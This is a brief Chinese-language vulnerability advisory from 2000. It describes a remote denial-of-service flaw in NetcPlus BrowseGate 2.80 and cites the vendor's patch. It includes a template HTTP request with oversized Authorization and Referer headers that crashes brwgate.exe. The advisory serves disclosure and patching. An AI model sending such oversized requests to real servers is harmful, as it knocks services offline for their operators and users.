NetcPlus BrowseGate 2.80存在被拒绝服务攻击发布时间:2000-09-25 更新时间:2000-09-25 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 NetcPlus BrowseGate 2.80详细描述 向NetcPlus BrowseGate 2.80发送一GET请求,如果包含大量的字符串如8K就会 导致服务崩溃。 GET / HTTP/1.0<cr> Authorization: Basic(8 KB string of characters)<cr> From: email@address.com<cr> If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT<cr> Referer: http://referrer/(8 KB string of characters)<cr> UserAgent: Browser 1.1<cr> <cr><cr> 将导致brwgate.exe崩溃 测试代码 见描述部分。 解决方案 NETCplus提供了补丁程序: http://www.netcplus.com/Xupgradefiles.htm 相关信息 |
